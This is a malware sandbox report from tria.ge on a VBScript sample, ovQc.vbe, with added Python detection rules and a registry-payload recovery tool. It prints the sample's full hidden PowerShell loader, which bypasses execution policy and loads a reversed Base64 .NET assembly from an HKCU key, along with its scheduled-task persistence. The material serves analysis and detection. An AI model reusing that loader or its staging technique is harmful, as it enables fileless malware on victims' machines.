Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel
150s
max time network
28s
platform
windows7_x64
resource
win7-20240729-en
resource tags
arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted
11/03/2025, 19:16
Static task
static1
Behavioral task
behavioral1
Sample
ovQc.vbe
Resource
win7-20240729-en
General
-
Target
ovQc.vbe
-
Size
10KB
-
MD5
ba104bdc908f978aaa1c4bdc39a3553a
-
SHA1
b1d0111c23c09f659fc9993ff5d1304c06ed5ba1
-
SHA256
2bfd3a4cf58b0bc16b1af17eba113dbd58d00d7b199634d08428126f79e2bf9c
-
SHA512
236b6666b7a3a994f519c6ba2f77a358c23d430d34300dbf2c948b121199f3094b7ce3a3060b32d46dd2d272b610fb5c1621530f7917fb775195594c3ef82b9b
-
SSDEEP
96:Lh31q9lqKylGu47UgHw63nw7ZAy6e3GowTC0qaXSZM6fiEoqDzG3gYBl/U4QlI+K:Lh1q9lqKy8wcnsay6eoeAaMZqfOHTSdK
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow  pid   Process
2     2324  WScript.exe
3     2324  WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs
Run PowerShell and hide display window.
Process: powershell.exe
pid: 3048, 1044, 2808, 2452, 924, 2436, 2376, 1304, 2440, 1960, 2052, 2612, 572

Drops file in System32 directory 11 IoCs
description: File opened for modification (11 events, one from each powershell.exe in the taskeng.exe subtree except PID 2052)
ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Process: powershell.exe
Note the literal %ProgramData% in the path: the variable was not expanded, so the target resolved relative to the System32 working directory. The file is the host's own Start Menu shortcut for Windows PowerShell, so this hit is a weak indicator on its own.

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description: HTTP User-Agent header
flow  ioc
2     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
3     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
This is the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object, an HTTP client commonly driven from VBScript; flows 2 and 3 are the two network requests attributed to WScript.exe (PID 2324) above.

Suspicious behavior: EnumeratesProcesses 12 IoCs
Process: powershell.exe
pid: 2436, 2376, 1304, 572, 3048, 1044, 2440, 1960, 2808, 2452, 2612, 924

Suspicious use of AdjustPrivilegeToken 12 IoCs
description: Token: SeDebugPrivilege
Process: powershell.exe
pid: 2436, 2376, 1304, 572, 3048, 1044, 2440, 1960, 2808, 2452, 2612, 924

Suspicious use of WriteProcessMemory 42 IoCs
pid   Process      wrote to pid  procid_target  events
2324  WScript.exe  2436          30             3
2132  taskeng.exe  2168          33             3
2168  WScript.exe  2376          35             3
2168  WScript.exe  1304          37             3
2168  WScript.exe  572           39             3
2168  WScript.exe  3048          41             3
2168  WScript.exe  1044          43             3
2168  WScript.exe  2440          45             3
2168  WScript.exe  1960          47             3
2168  WScript.exe  2808          49             3
2168  WScript.exe  2052          51             3
2168  WScript.exe  2452          53             3
2168  WScript.exe  2612          55             3
2168  WScript.exe  924           57             3
Every target is the direct child the writing process has just created (compare the process tree below), so these are start-up writes by a parent into its new child, not injection into a foreign process.

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times. The effect is visible in the process tree: taskeng.exe (PID 2132) starts WScript.exe (PID 2168) on C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs, the script the scheduled task re-launches.
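Detection logic for the chain these signatures describe, as an added example that is not part of the tria.ge report: a hidden, ExecutionPolicy-bypassed PowerShell that loads a Base64 assembly out of HKCU, spawned by a script host; taskeng.exe re-launching a .vbs from AppData\Roaming; and the WinHttp.WinHttpRequest.5 User-Agent from a script host (the Script User-Agent signature above). The process events are constructed from the command lines in this report; the parent images (explorer.exe, services.exe, cmd.exe), the benign control event and the MITRE technique IDs are the editor's assumptions, not the report's.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation record with the fields a Sysmon EID 1 or 4688 event carries."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# powershell.exe accepts unambiguous parameter prefixes, so match -w/-win/-windowstyle h/hidden.
HIDDEN = re.compile(r"-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b", re.I)
BYPASS = re.compile(r"-ex\w*\s+bypass\b", re.I)
# In-memory load of a Base64 blob read from the user hive: the loader pattern in this report.
REG_LOAD = re.compile(r"\[AppDomain\]::CurrentDomain\.Load\(.*FromBase64String", re.I | re.S)
HKCU = re.compile(r"HKCU:|HKEY_CURRENT_USER", re.I)
ROAMING_VBS = re.compile(r"\\AppData\\Roaming\\[^\"]+\.vbs\b", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"


def detect(ev: ProcEvent) -> list[str]:
    """Return the rule names that fire on one process-creation event."""
    hits = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    if image == "powershell.exe":
        if HIDDEN.search(ev.cmdline) and BYPASS.search(ev.cmdline):
            hits.append("T1059.001 hidden PowerShell with -ExecutionPolicy Bypass")
        if REG_LOAD.search(ev.cmdline) and HKCU.search(ev.cmdline):
            hits.append("T1059.001 .NET assembly loaded in memory from an HKCU value")
        if parent in SCRIPT_HOSTS:
            hits.append("T1059.005 script host spawned powershell.exe")
    # Windows 7 runs scheduled tasks through taskeng.exe; a .vbs in the roaming profile is user-writable.
    if image in SCRIPT_HOSTS and parent == "taskeng.exe" and ROAMING_VBS.search(ev.cmdline):
        hits.append("T1053.005 scheduled task runs a .vbs from AppData\\Roaming")
    return hits


def flag_user_agent(user_agent: str, process_image: str) -> bool:
    """Default UA of the WinHttp.WinHttpRequest.5.1 COM object, sent by a script host."""
    return user_agent.strip() == SCRIPT_UA and basename(process_image) in SCRIPT_HOSTS + ("mshta.exe",)


def run(events: list[ProcEvent]) -> dict[int, list[str]]:
    return {ev.pid: detect(ev) for ev in events}


# Command line of every powershell.exe in the report (PIDs 2436, 2376, ... 924).
PS_LOADER = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ExecutionPolicy Bypass '
             "-windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String("
             "(-join (Get-ItemProperty -LiteralPath 'HKCU:\\Software\\ifGtcQfISxddcGn' -Name 's').s | "
             "ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')")

# Constructed from the report's process tree; parent images are assumed, PID 4242 is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(2324, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ovQc.vbe"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(2436, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_LOADER,
              r"C:\Windows\System32\WScript.exe"),
    ProcEvent(2132, r"C:\Windows\system32\taskeng.exe",
              r"taskeng.exe {9461EC26-5943-456B-930A-2C29F4AC6F9C} "
              r"S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(2168, r"C:\Windows\System32\WScript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs"',
              r"C:\Windows\system32\taskeng.exe"),
    ProcEvent(4242, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, hits in run(SAMPLE_EVENTS).items():
        print(pid, hits or "-")
    print("script UA from WScript.exe:", flag_user_agent(SCRIPT_UA, r"C:\Windows\System32\WScript.exe"))
```

The three PowerShell rules are deliberately independent: the hidden-window/bypass pair fires on most malicious one-liners, the registry-load rule is specific to this loader's staging, and the parent-image rule catches the hand-off from the script host even if the command line is later obfuscated differently.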
Processes
-
C:\Windows\System32\WScript.exe (PID 2324, depth 1)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ovQc.vbe"
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2436, depth 2)
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  What this command line does: it reads the value s under HKCU\Software\ifGtcQfISxddcGn, joins its string(s), reverses the characters, Base64-decodes the result and loads the bytes as a .NET assembly into the current AppDomain, then calls the static method b on type b.b with the key name as its argument. The assembly is staged in the registry rather than dropped as a file; -windowstyle hidden keeps the console off-screen and -noexit keeps each host process alive after the command returns.
-
C:\Windows\system32\taskeng.exe (PID 2132, depth 1)
taskeng.exe {9461EC26-5943-456B-930A-2C29F4AC6F9C} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
- Suspicious use of WriteProcessMemory
  C:\Windows\System32\WScript.exe (PID 2168, depth 2)
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs"
  - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3; twelve instances, each with exactly the command line shown for PID 2436)
    PID 2376, 1304, 572, 3048, 1044, 2440, 1960, 2808, 2452, 2612, 924:
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID 2052:
    - Command and Scripting Interpreter: PowerShell
-
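Recovering the staged assembly from the registry, as an added example that is not part of the tria.ge report or of the sample: given a `reg export` of HKCU\Software\ifGtcQfISxddcGn, it parses the value s (REG_SZ or REG_MULTI_SZ in hex(7) form), undoes the loader's join, reverse and Base64 steps, checks for an MZ/PE header and hashes the result for pivoting. The registry dump and the "assembly" bytes are constructed here (the real payload is not in the report), and the 40-character chunking in stage_like_loader is an assumption used only to build that sample.

```python
from __future__ import annotations

import base64
import hashlib
import re
import struct

KEY_NAME = "ifGtcQfISxddcGn"  # registry key named in the report's command line


def parse_reg_value(reg_text: str, name: str):
    """Pull value `name` out of a `reg export` dump.

    Returns a str for REG_SZ ("name"="...") or a list[str] for REG_MULTI_SZ
    ("name"=hex(7):..., UTF-16LE, NUL-separated, double-NUL terminated).
    """
    joined = re.sub(r",\\\r?\n\s*", ",", reg_text)  # undo reg.exe line continuations
    match = re.search(rf'^"{re.escape(name)}"=(.*)$', joined, re.M)
    if not match:
        raise KeyError(name)
    raw = match.group(1).strip()
    if raw.startswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if raw.startswith("hex(7):"):
        data = bytes(int(b, 16) for b in raw[len("hex(7):"):].split(",") if b)
        return [s for s in data.decode("utf-16-le").split("\x00") if s]
    raise ValueError(f"unsupported value type for {name}: {raw[:12]}")


def recover_payload(value) -> bytes:
    """Undo the loader: -join the strings, reverse the characters, Base64-decode.

    PowerShell binds the reversed char array to FromBase64String's string
    parameter by joining it with $OFS (spaces); Convert.FromBase64String ignores
    white space, so the decoder strips it as well.
    """
    parts = [value] if isinstance(value, str) else list(value)
    b64 = "".join(parts)[::-1]
    return base64.b64decode(re.sub(r"\s+", "", b64))


def looks_like_pe(data: bytes) -> bool:
    """MZ stub plus a PE signature at e_lfanew: enough to call it a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(reg_text: str, name: str = "s") -> dict:
    payload = recover_payload(parse_reg_value(reg_text, name))
    return {"size": len(payload), "is_pe": looks_like_pe(payload),
            "sha256": hashlib.sha256(payload).hexdigest()}


# --- constructed sample data, not taken from the report ----------------------

def fake_pe_stub() -> bytes:
    """Stand-in for the staged assembly: a minimal MZ/PE header, no real code."""
    e_lfanew = 0x80
    header = bytearray(e_lfanew)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, e_lfanew)
    return bytes(header) + b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 18


def stage_like_loader(payload: bytes, chunk: int = 40) -> list[str]:
    """Inverse of recover_payload, used only to build the sample. Splitting the
    reversed Base64 into 40-char REG_MULTI_SZ elements is an assumption; the
    report shows only the read side."""
    reversed_b64 = base64.b64encode(payload).decode()[::-1]
    return [reversed_b64[i:i + chunk] for i in range(0, len(reversed_b64), chunk)]


def make_reg_export(values: list[str]) -> str:
    """Emit the hex(7) form reg.exe writes, including its ',\\' line wrapping."""
    blob = ("\x00".join(values) + "\x00\x00").encode("utf-16-le")
    items = [f"{b:02x}" for b in blob]
    body = ",\\\r\n  ".join(",".join(items[i:i + 25]) for i in range(0, len(items), 25))
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            f"[HKEY_CURRENT_USER\\Software\\{KEY_NAME}]\r\n"
            f'"s"=hex(7):{body}\r\n')


if __name__ == "__main__":
    print(triage(make_reg_export(stage_like_loader(fake_pe_stub()))))
```

On a live host the same key can be exported with `reg export HKCU\Software\ifGtcQfISxddcGn dump.reg` and fed to triage(); if is_pe comes back True the decoded bytes are the assembly the PowerShell hosts loaded, and the SHA256 is what to search for elsewhere.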
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
b2848a42adb72efb55f1873d8b8287d2
SHA1
a8c06d667d2d52664c9989f00eecca44229de0be
SHA256
9d1483a93d843b296b661bb20cc989b46fc05d30c6a8eb8a1c914a6e4a3fb626
SHA512
faa46d76526d696ac4ddc187aeb75f04bb3ea9aded34f61b190ba368a35ee9191aa172c88942949134ebfef44b5fe69d5d68483fd8b5bfbae3bd6998e2328d1f
-
Filesize
2KB
MD5
ae38697351c86c7aed1711c9edc478af
SHA1
fc723672262fb8d6e5020a14e39b47a25d35aa5f
SHA256
f400644bd84a139f46d9aa7e315012ec04efe0ce966a434bd479a28155bee5af
SHA512
fbe8b492c5191e7bfe7b44c7ac00fdbcb46c9c39b28000a3d57122533bdf994109119831defc8403d74fdc84551c13b476c01275b68487cda05f9ad54b1fbd82